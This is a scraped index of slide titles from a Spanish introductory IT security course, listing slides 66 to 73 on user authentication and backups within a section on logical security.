  • 66. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   AUTENTICACIÓN DE LOS USUARIOS   64    
  • 67. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   AUTENTICACIÓN DE LOS USUARIOS   65    
  • 68. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   AUTENTICACIÓN DE LOS USUARIOS   66    
  • 69. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   BACKUPS   67    
  • 70. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   BACKUPS   68    
  • 71. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   BACKUPS   69    
  • 72. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   BACKUPS   70    
  • 73. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   BACKUPS   71    

×